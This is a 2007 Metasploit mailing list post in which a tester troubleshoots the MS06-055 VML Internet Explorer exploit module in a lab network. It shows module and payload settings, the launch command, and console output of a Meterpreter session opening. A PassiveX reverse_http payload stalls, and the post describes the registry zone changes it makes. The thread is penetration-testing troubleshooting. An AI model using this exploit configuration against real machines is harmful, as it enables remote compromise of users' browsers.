Metasploit mailing list archives

PassiveX-based payloads and MS06-055

From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Tue, 13 Mar 2007 12:35:27 +0100



While doing few tests I noticed a strange behavior while trying
to exploit the VML processing vulnerability in IE referenced by the
Microsoft Bullettin MS06-055 on Windows XP SP1.

The first thing I tried is using Meterpreter as shown below.


msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required Description 
-------------------  -------- ----------- 
SRVHOST  192.168.33.130 yes       The local host to listen on. 
SRVPORT   8080 yes                        The local port to listen on. 
URIPATH  pentest no                         The URI to use for this
                                                           exploit(default
                                                        is random)
Payload options:

   Name      Current Setting   Required Description 
------------------- --------  -----------
DLL       /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The
                                        local path to the DLL to upload
EXITFUNC seh yes        Exit technique: seh, thread, process
LPORT 4444      yes       The local port                        


Exploit target:

   Id  Name                                
   --  ----                                
   0   Windows NT 4.0 -> Windows 2003 SP1  


msf exploit(ms06_055_vml_method) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.33.130:8080/pentest
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > 
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes) 
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.33.130:39557 ->
192.168.33.199:4444)

... and everything works fine.


When I try using PassiveX Meterpreter instead...

msf exploit(ms06_055_vml_method) > set PAYLOAD
windows/meterpreter/reverse_http PAYLOAD =>
windows/meterpreter/reverse_http msf exploit(ms06_055_vml_method) >
show options

Module options:

   Name     Current Setting  Required Description 
-------------------  -------- ----------- 
SRVHOST  192.168.33.130 yes       The local host to listen on. 
SRVPORT  8080 yes       The local port to listen on. 
URIPATH  pentest3 no        The URI to use for this exploit (default is
random)  


Payload options:

   Name       Current Setting   Required Description 
------------------- --------  -----------
DLL        /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The
                                        local path to the DLL to upload
EXITFUNC seh  yes       Exit technique: seh, thread, process 
PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838           yes
                                                        ActiveX CLSID
PXAXDLL    /home/buffer/msf3/data/passivex/passivex.dll yes ActiveX DLL
                                                        to inject
PXAXVER -1,-1,-1,-1 yes                         ActiveX DLL Version
PXHOST 192.168.33.130 yes       The local HTTP listener hostname 
PXPORT 10000 yes       The local HTTP listener port
PXURI      /OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s no The URI root for
                                                                        requests


I see this behavior...


msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/pentest3
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > 
[*] Sending PassiveX main page to client


and it stops here. I tried using other PassiveX-based payloads with
the same exploit but no luck... always the same result. Other non
PassiveX-based payloads work instead.

I took a look at the registry and everything seems to work fine since 

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3
Values: 1004, 1200, 1201, 1001

are changed to the value 0 as expected.


Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070313/e9440e7c/attachment.pgp>

Current thread:

PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
  - PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
    - PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
    - PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
    - PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 14)
    - PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 14)
    - PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 16)